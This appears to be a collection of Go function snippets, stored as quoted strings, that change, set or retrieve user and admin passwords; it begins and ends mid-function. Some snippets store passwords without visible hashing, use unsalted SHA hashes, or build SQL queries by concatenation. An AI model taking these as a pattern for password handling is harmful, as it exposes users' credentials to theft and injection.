|| localVarHttpResponse == nil {\n\t\treturn localVarReturnValue, localVarHttpResponse, err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHttpResponse.Body)\n\tlocalVarHttpResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHttpResponse, err\n\t}\n\n\tif localVarHttpResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHttpResponse.Status,\n\t\t}\n\t\tif localVarHttpResponse.StatusCode == 200 {\n\t\t\tvar v EdgeUpdateEdgeAdminPasswordResult\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\t\tif localVarHttpResponse.StatusCode == 400 {\n\t\t\tvar v ModelError\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\t\tif localVarHttpResponse.StatusCode == 500 {\n\t\t\tvar v ModelError\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHttpResponse, nil\n}", "func (this *managerStruct) SetPassword(name string, password string) error {\n\tthis.mutex.Lock()\n\tid := this.getUserId(name)\n\n\t/*\n\t * Check if we have a user with this ID.\n\t */\n\tif id < 0 {\n\t\tthis.mutex.Unlock()\n\t\treturn fmt.Errorf(\"User '%s' does not exist.\", name)\n\t} else {\n\t\tprng := this.prng\n\t\tsalt := make([]byte, LENGTH)\n\t\tnumBytes, err := prng.Read(salt)\n\n\t\t/*\n\t\t * Check if salt was generated.\n\t\t */\n\t\tif err != nil {\n\t\t\tthis.mutex.Unlock()\n\t\t\treturn fmt.Errorf(\"Failed to generate salt for user '%s' password change.\", name)\n\t\t} else if numBytes != LENGTH {\n\t\t\tthis.mutex.Unlock()\n\t\t\treturn fmt.Errorf(\"Failed to generate salt for user '%s': Incorrect number of bytes read from PRNG: Expected %d, got %d.\", name, LENGTH, numBytes)\n\t\t} else {\n\t\t\tpwdBytes := []byte(password)\n\t\t\tpwdHash := sha512.Sum512(pwdBytes)\n\t\t\tsaltAndHash := append(salt[:], pwdHash[:]...)\n\t\t\tusers := this.users\n\t\t\tfinalHash := sha512.Sum512(saltAndHash)\n\t\t\tusers[id].hash = finalHash[:]\n\t\t\tcopy(users[id].salt[:], salt)\n\t\t\tthis.mutex.Unlock()\n\t\t\treturn nil\n\t\t}\n\n\t}\n\n}", "func (c *Client) UpdatePassword(ctx context.Context, p *UpdatePasswordPayload) (res *SuccessResult, err error) {\n\tvar ires interface{}\n\tires, err = c.UpdatePasswordEndpoint(ctx, p)\n\tif err != nil {\n\t\treturn\n\t}\n\treturn ires.(*SuccessResult), nil\n}", "func SetNewPass(email, pass string) {\n\tDb.Debug().Table(\"users\").Where(\"email = ?\", email).Update(\"password\", pass)\n}", "func (a *UserAPI) ChangePassword(ctx *gin.Context) {\n\tpw := model.UserExternalPass{}\n\tif err := ctx.Bind(&pw); err == nil {\n\t\tuser := a.DB.GetUserByID(auth.GetUserID(ctx))\n\t\tuser.Pass = password.CreatePassword(pw.Pass, a.PasswordStrength)\n\t\ta.DB.UpdateUser(user)\n\t}\n}", "func (store *Authenticator) UpdatePassword(user, oldPass, newPass string) error {\n\tif ok, err := store.Authenticate(user, oldPass); ok {\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\th, err := store.mkHash(newPass)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tstore.UpdatePass(user, h)\n\t\treturn nil\n\t}\n\treturn InvalidPassErr\n}", "func (s *Service) UpdatePassword(loginPart string, userPasswordInformation *model.UserPasswordInformation) *UpdatePasswordOp {\n\treturn &UpdatePasswordOp{\n\t\tCredential: s.credential,\n\t\tMethod: \"PUT\",\n\t\tPath: strings.Join([]string{\"\", \"v2\", \"login_information\", loginPart}, \"/\"),\n\t\tPayload: userPasswordInformation,\n\t\tQueryOpts: make(url.Values),\n\t\tVersion: esign.APIv2,\n\t}\n}", "func (s *Shadow) SetChangePasswd() { s.changed = _CHANGE_PASSWORD }", "func (o *LdapProvider) GetAdminPassword() string {\n\tif o == nil || o.AdminPassword == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.AdminPassword\n}", "func (h *AuthHandlers) ChangePwd(w http.ResponseWriter, req *http.Request) {\n\tvar err error\n\tvar data []byte\n\n\tsystemContext, err := h.getSystemContext(req)\n\tif err != nil {\n\t\tlog.Error().Err(err).Msg(\"request context retrevial failure\")\n\t\tmiddleware.ReturnError(w, err.Error(), 500)\n\t\treturn\n\t}\n\n\tif data, err = ioutil.ReadAll(req.Body); err != nil {\n\t\tlog.Error().Err(err).Msg(\"read body error\")\n\t\tmiddleware.ReturnError(w, \"error reading changepwd data\", 500)\n\t\treturn\n\t}\n\tdefer req.Body.Close()\n\n\tloginDetails := &authz.LoginDetails{}\n\tif err := json.Unmarshal(data, loginDetails); err != nil {\n\t\tlog.Error().Err(err).Msg(\"marshal body error\")\n\t\tmiddleware.ReturnError(w, \"error reading changepwd data\", 500)\n\t\treturn\n\t}\n\tlog.Info().Str(\"org\", loginDetails.OrgName).Str(\"user\", loginDetails.Username).Msg(\"changepwd called\")\n\tif err := h.validate.Struct(loginDetails); err != nil {\n\t\tmiddleware.ReturnError(w, \"validation failure \"+err.Error(), 500)\n\t\treturn\n\t}\n\n\tloginDetails.OrgName = strings.ToLower(loginDetails.OrgName)\n\tloginDetails.Username = strings.ToLower(loginDetails.Username)\n\n\torgData, err := h.getOrgByName(req.Context(), systemContext, loginDetails.OrgName)\n\tif err != nil {\n\t\tlog.Error().Err(err).Str(\"org\", loginDetails.OrgName).Str(\"user\", loginDetails.Username).Msg(\"failed to get organization from name\")\n\t\tmiddleware.ReturnError(w, \"forgot password confirm failed\", 403)\n\t\treturn\n\t}\n\n\tif _, err := h.authenticator.SetNewPassword(req.Context(), orgData, loginDetails); err != nil {\n\t\tlog.Error().Err(err).Str(\"org\", loginDetails.OrgName).Str(\"user\", loginDetails.Username).Msg(\"set new password failed\")\n\t\tmiddleware.ReturnError(w, \"set new password failed\", 403)\n\t\treturn\n\t}\n\n\tresp := make(map[string]string, 0)\n\tresp[\"status\"] = \"ok\"\n\n\trespData, _ := json.Marshal(resp)\n\tw.WriteHeader(200)\n\tfmt.Fprint(w, string(respData))\n}", "func UpdateHostPassword(ctx context.Context, env evergreen.Environment, h *host.Host, u *user.DBUser, pwd string, r *http.Request) (*host.Host, int, error) {\n\tif !h.Distro.IsWindows() {\n\t\treturn nil, http.StatusBadRequest, errors.New(\"rdp password can only be set on Windows hosts\")\n\t}\n\tif !host.ValidateRDPPassword(pwd) {\n\t\treturn nil, http.StatusBadRequest, errors.New(\"Invalid password\")\n\t}\n\tif err := cloud.SetHostRDPPassword(ctx, env, h, pwd); err != nil {\n\t\treturn nil, http.StatusInternalServerError, err\n\t}\n\treturn h, http.StatusOK, nil\n}", "func setPassword(db *sql.DB) (passwd string, err error) {\n\n\tpassAttemptOne, err := gopass.GetPass(\"Please Enter the Password For your New Database:\")\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tpassAttemptTwo, err := gopass.GetPass(\"Please re-enter your new Password:\")\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tif passAttemptOne != passAttemptTwo {\n\n\t\tpasswd := \"\"\n\t\terr = fmt.Errorf(\"Sorry, the Passwords you entered dont match\")\n\t\treturn passwd, err\n\n\t}\n\n\thashedPassword := hashStringToSHA256(passAttemptOne)\n\terr = InsertPassword(db, hashedPassword)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\treturn passAttemptOne, err\n\n}", "func (srv *Service) UpdateUserPassword(id string, password string) (*string, error) {\n\t//generate hash from the password\n\tcrypt := pkg.EncryptPassword(password)\n\n\t//check if the email already exists\n\tuser, err := srv.mongoRepository.GetUserByID(id)\n\tif user == nil { //user doesn't exist\n\t\treturn nil, &pkg.Error{Err: err, Code: http.StatusNotFound, Message: \"User with these credentials not found\"}\n\t}\n\n\t//call driven adapter responsible for updating a user's password inside the database\n\t_, err = srv.mongoRepository.UpdateUserPassword(id, string(crypt))\n\n\tif err != nil {\n\t\t//return the error sent by the repository\n\t\treturn nil, err\n\t}\n\n\tmessage := \"Password updated sucessfully\"\n\n\treturn &message, nil\n}", "func (h *Handler) ChangePassword(args []string) error {\n\told, err := h.Term.ReadPassword(\"Enter your old password:\")\n\tif err != nil {\n\t\treturn err\n\t}\n\tgood, err := h.CurrentUser.CheckPassword(old)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif good {\n\t\tnew1, err := h.Term.ReadPassword(\"Enter your new password:\")\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tnew2, err := h.Term.ReadPassword(\"Repeat your new password:\")\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif new1 == new2 {\n\t\t\tif len(new1) > 0 {\n\t\t\t\t_, err1 := h.writeToUser(\"Setting new password...\")\n\t\t\t\tif err1 != nil {\n\t\t\t\t\treturn err1\n\t\t\t\t}\n\t\t\t\treturn h.CurrentUser.SetPassword(new1)\n\t\t\t}\n\t\t\treturn fmt.Errorf(\"unable to use empty password!\")\n\t\t}\n\t\treturn fmt.Errorf(\"passwords do not match\")\n\t}\n\treturn fmt.Errorf(\"wrong password\")\n}", "func partialUpdatePassword(providedUser *models.User, payload inputs.ProfileInput) error {\n\n\tif payload.OldPassword == \"\" || payload.NewPassword == \"\" {\n\t\treturn nil\n\t}\n\n\tok, err := AuthorizationServices.ComparePasswords(payload.OldPassword, providedUser.Password)\n\tif !ok || err != nil {\n\t\treturn &utils.IncorrectPasswordError{}\n\t}\n\n\thashedPassword, _ := AuthorizationServices.GeneratePassword(payload.NewPassword)\n\n\tprovidedUser.Password = hashedPassword\n\n\treturn nil\n}", "func ChangePassword(ctx context.Context, sugar *zap.SugaredLogger, client clients.Client, job *entities.Job) entities.Result {\n\tnewPassword, ok := job.Data[\"new_password\"]\n\tif !ok || newPassword == \"\" {\n\t\treturn entities.Result{Errors: []error{fmt.Errorf(\"missing or empty new password for change password operation\")}}\n\t}\n\n\tuser, ok := job.Data[\"user\"]\n\tif !ok || newPassword == \"\" {\n\t\tuser = \"admin\"\n\t}\n\n\tresults := make([]entities.CommandResult, 0, 2)\n\n\testablishResult, err := clients.EstablishConnection(ctx, sugar, client, job)\n\tresults = append(results, establishResult)\n\tif err != nil {\n\t\treturn entities.Result{Results: results, Errors: []error{err}}\n\t}\n\tdefer client.Close()\n\n\tcommands := []entities.Command{\n\t\t{Body: fmt.Sprintf(\"/user/set =numbers=%s =password=%s\", user, newPassword), Expect: \"!done\"},\n\t}\n\n\tcommandResults, _, err := clients.ExecuteCommands(ctx, client, commands)\n\tresults = append(results, commandResults...)\n\tif err != nil {\n\t\treturn entities.Result{Results: results, Errors: []error{fmt.Errorf(\"executing custom commands error %v\", err)}}\n\t}\n\treturn entities.Result{Results: results}\n}", "func (o KubernetesClusterKubeAdminConfigOutput) Password() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v KubernetesClusterKubeAdminConfig) *string { return v.Password }).(pulumi.StringPtrOutput)\n}", "func (u *user) SetPassword(password string) error {\n length := utf8.RuneCountInString(password)\n if length < PasswordLenMin || length > PasswordLenMax {\n err := fmt.Errorf(\"Password must be len characters long, where %d<=len<=%d\",\n PasswordLenMin, PasswordLenMax)\n return err\n }\n u.passwordHash = generatePasswordHash(password)\n\n return nil\n}", "func UpdatePasswordHandler(repo UpdatePasswordOrganizationRepository) func(w http.ResponseWriter, r *http.Request) {\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\tvar handlerForm map[string]string\n\n\t\terr := requestToJSONObject(r, &handlerForm)\n\t\tif err != nil {\n\t\t\tHandleHTTPError(w, http.StatusBadRequest, err)\n\t\t\treturn\n\t\t}\n\n\t\tuserID := GetUserID(r)\n\t\torganization, err := repo.Get(userID)\n\n\t\tvar cPassword, nPassword string\n\t\tvar ok bool\n\n\t\tif cPassword, ok = handlerForm[\"currentPassword\"]; !ok {\n\t\t\tHandleHTTPError(w, http.StatusBadRequest, errors.New(\"você deve informar senha atual\"))\n\t\t\treturn\n\t\t}\n\n\t\tif nPassword, ok = handlerForm[\"newPassword\"]; !ok {\n\t\t\tHandleHTTPError(w, http.StatusBadRequest, errors.New(\"você deve informar a nova senha\"))\n\t\t\treturn\n\t\t}\n\n\t\tif _, err = repo.ChangePassword(*organization, cPassword, nPassword); err != nil {\n\t\t\tHandleHTTPError(w, http.StatusUnauthorized, err)\n\t\t\treturn\n\t\t}\n\n\t\tHandleHTTPSuccessNoContent(w)\n\t}\n}", "func (ctl UserController) Update(c *gin.Context) {\n\tvar body struct {\n\t\tPassword string `json:\"password\" binding:\"required\"`\n\t}\n\tif err := c.ShouldBindJSON(&body); err != nil {\n\t\tc.JSON(rootCtl.wrap(http.StatusUnprocessableEntity, err.Error()))\n\t\treturn\n\t}\n\n\tif err := microsoft.NewUser().UpdatePassword(c.Param(\"id\"), c.Param(\"uid\"), body.Password); err != nil {\n\t\tc.JSON(rootCtl.wrap(http.StatusInternalServerError, err.Error()))\n\t\treturn\n\t}\n\n\tc.JSON(rootCtl.wrap(http.StatusOK))\n}", "func (h *AuthHandler) RenderUpdatePassword(w http.ResponseWriter, r *http.Request) {\n\tview := NewView(r)\n\tview.Render(w, \"auth/password\")\n}", "func (orm *ORM) UpdateAdmin(ctx context.Context, adminID string, fullname *string, email *string, phone *string) (bool, error) {\n\tvar _Admin models.Admin\n\n\terr := orm.DB.DB.First(&_Admin, \"id = ?\", adminID).Error\n\tif errors.Is(err, gorm.ErrRecordNotFound) {\n\t\treturn false, errors.New(\"AdminNotFound\")\n\t}\n\n\tif fullname != nil {\n\t\t_Admin.FullName = *fullname\n\t}\n\tif email != nil {\n\t\t_Admin.Email = *email\n\t}\n\tif phone != nil {\n\t\t_Admin.Phone = phone\n\t}\n\torm.DB.DB.Save(&_Admin)\n\treturn true, nil\n\n}", "func resetPassword(w http.ResponseWriter, req *http.Request) {\n\n\tuserData, _ := getUserAndSession(w, req)\n\n\tif !userData.LoggedIn {\n\t\thttp.Redirect(w, req, \"/\", http.StatusSeeOther)\n\t\treturn\n\t}\n\n\tif req.Method == http.MethodPost {\n\n\t\t// Get posted password\n\t\tnewPassword := req.FormValue(\"password\")\n\n\t\t// Ecrypt password before storing it. If the encryption errs, respond with\n\t\t// an Internal Server Error.\n\t\tencryptedPassword, err := getEncryptedPassword(newPassword)\n\t\tif err != nil {\n\t\t\thttp.Error(w, \"Internal server error\", http.StatusInternalServerError)\n\t\t\treturn\n\t\t}\n\n\t\t// Update user in dbUsers map\n\t\tuserData.Password = encryptedPassword\n\t\tdbUsers[userData.UserID] = userData\n\n\t\t// Redirect to Home page after changing password\n\t\thttp.Redirect(w, req, \"/\", http.StatusSeeOther)\n\t\treturn\n\t}\n\n\ttpl.ExecuteTemplate(w, \"resetPassword.gohtml\", userData)\n}", "func (s *Store) ChangeUserPassword(email string, newPassword string) error {\r\n\tfilter := bson.M{\r\n\t\t\"email\": bson.M{\r\n\t\t\t\"$eq\": email,\r\n\t\t},\r\n\t}\r\n\r\n\tupdate := bson.M{\r\n\t\t\"$set\": bson.M{\r\n\t\t\t\"password\": newPassword,\r\n\t\t},\r\n\t}\r\n\r\n\tuserCollection := s.Collection(\"userCredentials\")\r\n\r\n\tupdateResult, err := userCollection.UpdateOne(context.TODO(), filter, update)\r\n\tif err != nil {\r\n\t\treturn err\r\n\t}\r\n\r\n\tlog.Printf(\"Changed password for user %s. %v documents were matched and %v were modified.\\n\",\r\n\t\temail, updateResult.MatchedCount, updateResult.ModifiedCount)\r\n\r\n\treturn nil\r\n}", "func ChangePasswordDisplay(w http.ResponseWriter, r *http.Request) {\n\tauth := service.GetSessionMember(r)\n\ttemplateData := map[string]interface{}{\n\t\t\"title\": \"Change Password\",\n\t\t\"auth\": auth,\n\t}\n\n\ttmpl := template.Must(template.ParseFiles(\"template/admin_members/change_password.tmpl\", setting.UserTemplate))\n\tif err := tmpl.ExecuteTemplate(w, \"base\", templateData); err != nil {\n\t\tLogger.Error(err.Error())\n\t}\n}", "func (m *manager) AdminUpdate(ctx context.Context) error {\n\ttoRun := m.adminUpdate()\n\treturn m.runSteps(ctx, toRun, \"adminUpdate\")\n}", "func InitialAdminPassword() (string, error) {\n\treturn DefaultMgr().Get(backgroundCtx, common.AdminInitialPassword).GetString(), nil\n}", "func ChangePassword(user *structs.User, password string) error {\n\thashedPassword := utils.HashPassword(password)\n\t_, err := dot.Exec(db, updatePasswordQuery, hashedPassword, user.Id)\n\n\tif err != nil {\n\t\treturn errors.InternalServerError(\"\", err.Error())\n\t}\n\n\treturn err\n}", "func runPassword(cmd *cobra.Command, args []string) {\n\tc := utils.GetClient()\n\tvar username string\n\n\tif len(args) == 1 {\n\t\tusername = args[0]\n\t}\n\n\tif flagPassWord != \"\" {\n\t\terr := c.Security.SetPasswordForUser(username, flagPassWord)\n\t\tif err != nil {\n\t\t\tjww.DEBUG.Println(err)\n\t\t\tjww.ERROR.Panicln(\"user add: unable to set password for user\")\n\t\t}\n\t}\n\tjww.FEEDBACK.Printf(\"password set for user %s \\n\", username)\n\n}", "func (user *User) EditClientPw() (err error) {\n\t_, err = Db.Exec(\"update user set name=$1, email=$2 , password=$3 , image=$4 where id=$5\",user.Name, user.Email, user.Password, user.Image, user.ID)\n\nfmt.Println(err)\nreturn\n}", "func generatePassword(a *app.App) error {\r\n\tr := make([]byte, 16)\r\n\t_, err := rand.Read(r)\r\n\tif err != nil {\r\n\t\treturn err\r\n\t}\r\n\ts := base64.RawStdEncoding.EncodeToString(r)\r\n\thash, err := bcrypt.GenerateFromPassword([]byte(s), bcrypt.DefaultCost)\r\n\tif err != nil {\r\n\t\treturn err\r\n\t}\r\n\terr = a.DB.Update(func(tx *bolt.Tx) error {\r\n\t\tb := tx.Bucket([]byte(\"settings\"))\r\n\t\treturn b.Put([]byte(\"password-hash\"), hash)\r\n\t})\r\n\tif err != nil {\r\n\t\treturn err\r\n\t}\r\n\tfmt.Println(\"New password: \" + s)\r\n\treturn nil\r\n}", "func (handler *Handler) handlePasswordUpdate(w http.ResponseWriter, r *http.Request) {\n\n\t//We have gone through the auth, so we should know the id of the logged in user\n\tloggedInUser := r.Context().Value(\"user\").(int) //Grab the id of the user that send the request\n\n\t//Create a new password change object\n\tinfo := updatePasswordChangeStruct{}\n\n\t//Now get the json info\n\terr := json.NewDecoder(r.Body).Decode(&info)\n\tif err != nil {\n\t\tutils.ReturnJsonError(w, http.StatusUnprocessableEntity, err)\n\t\treturn\n\n\t}\n\n\t//Now update the password\n\terr = handler.userHelper.passwordChange(loggedInUser, info)\n\n\t//Check to see if the user was created\n\tif err == nil {\n\t\tutils.ReturnJsonStatus(w, http.StatusAccepted, true, \"password_change_success\")\n\t} else {\n\t\tutils.ReturnJsonError(w, http.StatusForbidden, err)\n\t}\n\n}", "func ChangePassword(userName string, password string, newPassword string, customCols map[string]interface{}) error {\n\tif len(userName) == 0 {\n\t\treturn errors.New(\"A user name is required to change a password\")\n\t} else if len(password) == 0 {\n\t\treturn errors.New(\"A password is required to change a password\")\n\t} else if len(newPassword) == 0 {\n\t\treturn errors.New(\"A new password is required to change a password\")\n\t} else if checkStringSQLInjection(userName) {\n\t\treturn errors.New(\"Malicious characters detected\")\n\t} else if !checkCustomRequirements(customCols, customPasswordChangeRequirements) {\n\t\treturn errors.New(\"Incorrect data supplied\")\n\t}\n\n\t//FIRST TWO ARE id, password IN THAT ORDER\n\tvar vals []interface{} = []interface{}{new(int), new([]byte)}\n\tvar valsList []interface{} = []interface{}{}\n\n\t//CONSTRUCT SELECT QUERY\n\tselectQuery := \"Select \" + usersColumnID + \", \" + usersColumnPassword + \", \"\n\tif customCols != nil {\n\t\tfor key, val := range customCols {\n\t\t\tselectQuery = selectQuery + key + \", \"\n\t\t\t//MAINTAIN THE ORDER IN WHICH THE COLUMNS WERE DECLARED VIA A SLICE\n\t\t\tvals = append(vals, new(interface{}))\n\t\t\tvalsList = append(valsList, []interface{}{val, customAccountInfo[key].dataType, key})\n\t\t}\n\t}\n\tselectQuery = selectQuery[0:len(selectQuery)-2] + \" FROM \" + tableUsers + \" WHERE \" + usersColumnName + \"=\\\"\" + userName + \"\\\" LIMIT 1;\"\n\n\t//EXECUTE SELECT QUERY\n\tcheckRows, err := database.Query(selectQuery)\n\tif err != nil {\n\t\treturn err\n\t}\n\t//\n\tcheckRows.Next()\n\tif scanErr := checkRows.Scan(vals...); scanErr != nil {\n\t\tcheckRows.Close()\n\t\treturn errors.New(\"Login or password is incorrect\")\n\t}\n\tcheckRows.Close()\n\n\t//\n\tdbIndex := *(vals[0]).(*int) // USE FOR SERVER CALLBACK & MAKE DATABASE RESPONSE MAP\n\tdbPass := *(vals[1]).(*[]byte)\n\n\t//COMPARE HASHED PASSWORDS\n\tif !helpers.CheckPasswordHash(password, dbPass) {\n\t\treturn errors.New(\"Login or password is incorrect\")\n\t}\n\n\t//ENCRYPT NEW PASSWORD\n\tpassHash, hashErr := helpers.HashPassword(newPassword, encryptionCost)\n\tif hashErr != nil {\n\t\treturn hashErr\n\t}\n\n\t//UPDATE THE PASSWORD\n\t_, updateErr := database.Exec(\"UPDATE \" + tableUsers + \" SET \" + usersColumnPassword + \"=\\\"\" + passHash + \"\\\" WHERE \" + usersColumnID + \"=\" + strconv.Itoa(dbIndex) + \" LIMIT 1;\")\n\tif updateErr != nil {\n\t\treturn updateErr\n\t}\n\n\t//\n\treturn nil\n}", "func (mc *MonitaClient) ChangePassword(request user.ChangePasswordRequest) error {\n\t_, err := mc.request(\"PATCH\", \"v1/user/password\", request, nil, 200)\n\n\treturn err\n}", "func ChangePassword() echo.HandlerFunc {\n\treturn func(context echo.Context) error {\n\t\tsession := context.Get(\"session\").(*session.Session)\n\t\tif session == nil {\n\t\t\tlog.Printf(\"ERROR: invalid session %+v\", session)\n\t\t\treturn context.JSON(http.StatusUnauthorized, \"\")\n\t\t}\n\n\t\toldPassword, newPassword := context.FormValue(\"password\"), context.FormValue(\"newPassword\")\n\t\tif oldPassword == \"\" {\n\t\t\treturn context.JSON(http.StatusBadRequest, errors.New(\"Missing password parameter in POST body\"))\n\t\t}\n\n\t\temail := session.Email\n\t\tuser, err := FindByEmail(email)\n\t\tif err != nil {\n\t\t\tlog.Println(err)\n\t\t\treturn context.JSON(http.StatusUnauthorized, errors.New(\"Wrong email and password combination\"))\n\t\t}\n\t\terr = bcrypt.CompareHashAndPassword([]byte(user.Hash), []byte(oldPassword))\n\t\tif err != nil {\n\t\t\tlog.Println(err)\n\t\t\treturn context.JSON(http.StatusUnauthorized, errors.New(\"Wrong email and password combination\"))\n\t\t}\n\t\thash, bcryptErr := bcrypt.GenerateFromPassword([]byte(newPassword), bcrypt.DefaultCost)\n\t\tif bcryptErr != nil {\n\t\t\tlog.Println(bcryptErr)\n\t\t\treturn context.JSON(http.StatusInternalServerError, errors.New(\"Server error. The password was not changed.\"))\n\t\t}\n\n\t\terr = SavePassword(user, string(hash))\n\t\tif err != nil {\n\t\t\tlog.Println(err)\n\t\t\treturn context.JSON(http.StatusInternalServerError, errors.New(\"Server error. The password was not changed.\"))\n\t\t}\n\n\t\treturn context.JSON(http.StatusOK, nil)\n\t}\n}", "func (c *Config) GetCheAdminPassword() string {\n\treturn c.secretValues[varCheAdminPassword]\n}", "func UpdateUserPass(username, pass, fundpass string) bool {\n\torm := get_DBFront()\n\tt := make(map[string]interface{})\n\tt[\"password\"] = pass\n\tt[\"fundpassword\"] = fundpass\n\t_, err := orm.SetTable(\"user\").Where(\"username=?\", username).Update(t)\n\tif !check_err(err) {\n\t\tLog(Log_Struct{\"error\", \"DB_Error_Line_251\", err})\n\t\treturn false\n\t}\n\treturn true\n}", "func (p *Password) Update(pwd string) {\n\t*p = Password(pwd)\n\t_ = p.rehash()\n}", "func UsersUpdate(c buffalo.Context) error {\n\ttx := c.Value(\"tx\").(*pop.Connection)\n\tuser := &models.User{}\n\terr := tx.Eager(\"Contracts.Boss\").Find(user, c.Param(\"user_id\"))\n\tif err != nil {\n\t\tc.Flash().Add(\"warning\", \"Cannot find that user.\")\n\t\treturn c.Redirect(307, \"/\")\n\t}\n\n\tc.Request().ParseForm()\n\tcurr := c.Request().Form[\"CurrentPassword\"]\n\tnew := c.Request().Form[\"NewPassword\"]\n\tif len(curr) == 0 || len(new) == 0 {\n\t\tc.Flash().Add(\"warning\", \"Form is incomplete.\")\n\t\treturn c.Redirect(302, \"/users/%s\", user.ID)\n\t}\n\n\tuser.Password = curr[0]\n\tif user.Authenticate() != true {\n\t\tc.Flash().Add(\"warning\", \"Password does not match the one on record.\")\n\t\treturn c.Redirect(303, \"/users/%s\", user.ID)\n\t}\n\n\t// Update password on User and generate hash.\n\tuser.Password = new[0]\n\t_, err = user.UpdatePassword(tx)\n\tif err != nil {\n\t\tc.Flash().Add(\"warning\", \"Error saving new password.\")\n\t\treturn c.Redirect(303, \"/users/%s\", user.ID)\n\t}\n\n\tc.Flash().Add(\"success\", \"Password changed.\")\n\treturn c.Redirect(303, \"/users/%s\", user.ID)\n}", "func (adminser *AdminService) ChangePassword(ctx context.Context) (bool, error) {\n\treturn adminser.Repo.ChangePassword(ctx)\n}", "func (s *UpdateNamespaceInput) SetAdminUserPassword(v string) *UpdateNamespaceInput {\n\ts.AdminUserPassword = &v\n\treturn s\n}", "func (a Authorizer) UpdateUser(username string, m map[string]interface{}, currUserName string) error {\n\tvar (\n\t\thash []byte\n\t)\n\n\tuser, err := a.userDao.User(username)\n\tif err != nil {\n\t\tlogger.Get().Error(\"Error retrieving the user: %s. error: %v\", username, err)\n\t\treturn err\n\t}\n\n\tif val, ok := m[\"oldpassword\"]; ok {\n\t\top := val.(string)\n\t\tmatch := bcrypt.CompareHashAndPassword(user.Hash, []byte(op))\n\t\tif match != nil {\n\t\t\tlogger.Get().Error(\"Old password doesnt match\")\n\t\t\treturn mkerror(\"Old password doesnt match\" + err.Error())\n\t\t} else {\n\t\t\tif val, ok := m[\"password\"]; ok {\n\t\t\t\tp := val.(string)\n\t\t\t\thash, err = bcrypt.GenerateFromPassword([]byte(p), bcrypt.DefaultCost)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlogger.Get().Error(\"Error saving the password for user: %s. error: %v\", username, err)\n\t\t\t\t\treturn mkerror(\"couldn't save password: \" + err.Error())\n\t\t\t\t}\n\t\t\t\tuser.Hash = hash\n\t\t\t}\n\t\t}\n\t} else {\n\t\tcurUser, e := a.userDao.User(currUserName)\n\t\tif e != nil {\n\t\t\tlogger.Get().Error(\"Error retrieving the user: %s. error: %v\", currUserName, e)\n\t\t\treturn e\n\t\t}\n\t\tif curUser.Role == \"admin\" {\n\t\t\tif val, ok := m[\"password\"]; ok {\n\t\t\t\tp := val.(string)\n\t\t\t\thash, err = bcrypt.GenerateFromPassword([]byte(p), bcrypt.DefaultCost)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlogger.Get().Error(\"Error saving the password for user: %s. error: %v\", username, err)\n\t\t\t\t\treturn mkerror(\"couldn't save password: \" + err.Error())\n\t\t\t\t}\n\t\t\t\tuser.Hash = hash\n\t\t\t}\n\t\t} else {\n\t\t\tlogger.Get().Error(\"Error saving the password for user since no previledge: %s. error: %v\", username, err)\n\t\t\treturn mkerror(\"couldn't save password: \" + err.Error())\n\t\t}\n\t}\n\n\tif val, ok := m[\"email\"]; ok {\n\t\te := val.(string)\n\t\tuser.Email = e\n\t}\n\n\tif val, ok := m[\"notificationenabled\"]; ok {\n\t\tn := val.(bool)\n\t\tuser.NotificationEnabled = n\n\t}\n\n\tif val, ok := m[\"status\"]; ok {\n\t\ts := val.(bool)\n\t\tuser.Status = s\n\t}\n\n\terr = a.userDao.SaveUser(user)\n\tif err != nil {\n\t\tlogger.Get().Error(\"Error saving the user: %s to DB. error: %v\", username, err)\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (pm *PasswdManager) updatePortPasswd(port, password string, auth bool) {\n\tpl, ok := pm.get(port)\n\tif !ok {\n\t\tlog.Printf(\"new port %s added\\n\", port)\n\t} else {\n\t\tif pl.password == password {\n\t\t\treturn\n\t\t}\n\t\tlog.Printf(\"closing port %s to update password\\n\", port)\n\t\tpl.listener.Close()\n\t}\n\t// run will add the new port listener to passwdManager.\n\t// So there maybe concurrent access to passwdManager and we need lock to protect it.\n\tgo run(port, password, auth)\n\tif udp 